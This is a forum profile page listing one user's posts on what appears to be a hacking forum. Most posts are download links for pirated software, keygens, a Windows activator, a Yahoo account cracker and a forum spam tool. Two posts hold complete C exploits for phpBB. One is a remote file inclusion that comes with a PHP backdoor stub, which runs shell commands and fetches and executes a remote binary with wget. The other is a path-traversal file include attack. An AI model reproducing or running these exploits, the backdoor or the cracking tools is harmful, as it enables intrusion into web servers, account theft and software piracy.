
RedJoker
Active Members-
Posts
384 -
Joined
-
Last visited
Everything posted by RedJoker
-
eu as zice ca este o prezentare ... nu numa un simplu salut ... dar totusi .. salutare !!
-
Resources in any 32bit Windows 95/98/ME/NT/2000 executable files (including exe’s, dll’s, ocx’s and cpl’s) can be viewed by selecting File|Open from Resource Hacker’s menu. A full list of the file’s resources will be displayed in a tree structure. The resource tree can be fully expanded or collapsed by selecting View|Expand Tree or View|Collapse Tree respectively from the menu. http://rapidshare.com/files/40712248/ResHacker.rar.html
-
thx dude ...
-
http://rapidshare.com/files/40204197/KIS_7.0.0125.rar KIS Keys (2 x 2008) : http://rapidshare.com/files/38283564/KIS_Keys__2008_.rar
-
Yahoo!Messenger Monitor Sniffer v3.0 (Am pus serial number)
RedJoker replied to EthicalHacker's topic in Programe hacking
thx man .....nice post -
baietzi daca aveti domenii .. trebe cumparate cu bani legali .. nu cu niste carduri furate ... si cel ce vinde la fel !!
-
este detectabil ca trojan de catre nod32 !!
-
/* exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb <url_to_system> <phpbb_dir> <url_to_b4b0.php> telnet <url_of_exploited_system> <port_of_back_door> greets to b4b0 -- evilrabbi */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> void help(char *program_name); int main(int argc, char *argv[]) { struct sockaddr_in trg; struct hostent *he; int sockfd, buff; char buffer[1024]; char *request; if(argc != 4 ) { help(argv[0]); exit(0); } he = gethostbyname(argv[1]); sockfd = socket(AF_INET, SOCK_STREAM, 0); request = (char *) malloc(1024); trg.sin_family = AF_INET; trg.sin_port = htons(80); trg.sin_addr = *((struct in_addr *) he->h_addr); memset(&(trg.sin_zero), '\0', 8); connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr)); sprintf(request,"GET http://%s/%s/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://%s?cmd=w\n",argv[1],argv[2],argv[3]); send(sockfd,request,strlen(request),0); buff=recv(sockfd, buffer, 1024-1, 0); buffer[buff] = '\0'; printf("%s",buffer); close(sockfd); return 0; } void help(char *program_name) { printf("b4b0-phpbb.c by evilrabbi for b4b0\n\n"); printf("%s hostname phpbb2_dir url_to_bad_php\n",program_name); printf("%s www.example.com phpBB2 blah.com/b4b0.php.php\n",program_name); } /* Start of b4b0.php */ /* b4b0 kickin ass again....... System was exploited telnet to the port you have your backdoor set to listen on. <? if (isset($chdir)) @chdir($chdir); ob_start(); system("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); system("cd /tmp; wget url_to_backdoor;chmod +x backdoor_name;./backdoor_name"); // EDIT THIS INFO!!!!!!!!!!!!! $output = ob_get_contents(); ob_end_clean(); if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); ?> */
-
/***********************************************************/ /* phpBB 2.0.4 Remote Admin_Styles.PHP Theme_Info.CFG File Include */ /* */ /* Exploit made on June 2003 by Spoofed Existence */ /* */ /* Patch : [url]http://www.phpbb.com/phpBB/viewtopic.php?t=113826[/url] */ /***********************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> int main() { //The socket stuff struct hostent *hp; struct sockaddr_in sa; int sock; //The input stuff char server[100]; char location[100]; char sfile[100]; int escapes; char* file; //The request stuff char* request; char* postdata; char* header; //The buffer to store the response char buffer[4096]; int tworeturns = 0; int showing = 0; //Other int i; //Ask the server printf("Server: "); scanf("%100s", server); printf("Forum location: "); scanf("%100s", location); printf("Directories to escape: "); scanf("%i", &escapes); printf("File to get/execute: "); scanf("%100s", sfile); //Start the exploit! printf("\n\nStarting the exploit...\n"); //Connect to the server printf("Creating socket... "); if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("Failed!\n"); return 0; } else{ printf("Done!\n"); } printf("Looking up server IP... "); if((hp = gethostbyname((char*)server)) == NULL) { printf("Failed!\n"); return 0; } else { printf("Done!\n"); } printf("Connecting %s:80... ", server); memcpy(&sa.sin_addr, hp->h_addr_list[0], hp->h_length); sa.sin_family = AF_INET; sa.sin_port = htons(80); if(connect(sock, (struct sockaddr*)&sa, sizeof(sa))) { printf("Failed!\n"); return 0; } else { printf("Done!\n"); } //Create the request printf("Building request... "); //Create the postdata file = (char*)malloc(sizeof(char) * (escapes * 3 + strlen(sfile) + 1)); while(escapes > 0) { if(escapes == 1) { sprintf(file, "%s%s%s", file, "..", sfile); } else { sprintf(file, "%s%s", file, "../"); } escapes --; } postdata = (char*)malloc((27 + strlen(file)) * sizeof(char)); sprintf(postdata, "send_file= &install_to=%s%s00", file, "%"); header = (char*)malloc((170 + strlen(server) + strlen(location)) * sizeof(char)); sprintf(header, "POST /%s/admin/admin_styles.php?mode=addnew HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nHost: %s\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", location, server, strlen(postdata)); request = (char*)malloc((strlen(postdata) + strlen(header) + 1) * sizeof(char)); sprintf(request, "%s%s", header, postdata); printf("Done!\n"); //Send the request printf("Sending request... "); write(sock, request, strlen(request)); printf("Done!\n"); printf("\nResponse:\n"); //Get the response while(recv(sock, buffer, 4096, 0) != 0) { for(i = 0; i < strlen(buffer); i++) { //Only show the character when it should if(showing == 1) { printf("%c", buffer[ i ]); } //Stop showing from \n \n if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' && buffer[i + 3] == 'r' && buffer[i + 4] == '>' && buffer[i + 5] == '\n' && showing == 1) { showing = 0; tworeturns = 0; } //Or from \n \n if(buffer[ i ] == '\n' && buffer[i + 1] == '<' && buffer[i + 2] == 'b' && buffer[i + 3] == 'r' && buffer[i + 4] == ' ' && buffer[i + 5] == '/' && buffer[i + 6] == '>' && buffer[i + 7] == '\n' && showing == 1) { showing = 0; tworeturns = 0; } //If there's a return and tworeturns = true, start showing it if(buffer[ i ] == '\n' && tworeturns == 1) { showing = 1; } //If there are two returns, set tworeturns to true and add 3 to i if(buffer[ i ] == '\r' && buffer[i + 1] == '\n' && buffer[i + 2] == '\r' && buffer[i + 3] == '\n') { tworeturns = 1; i += 3; } } } printf("\n"); return 0; }
-
http://rapidshare.com/files/34426013/Windows_XP_KeyGen.exe.html
-
http://rapidshare.com/files/34425920/superscan.rar.html
-
http://rapidshare.com/files/34425710/Win_XP_Activator.rar.html
-
http://rapidshare.com/files/34425613/yahooUltraCracker.rar.html
-
http://rapidshare.com/files/34425480/UC.Forum_Spam.rar.html
-
http://rapidshare.com/files/34425405/Proxy_Pro.rar.html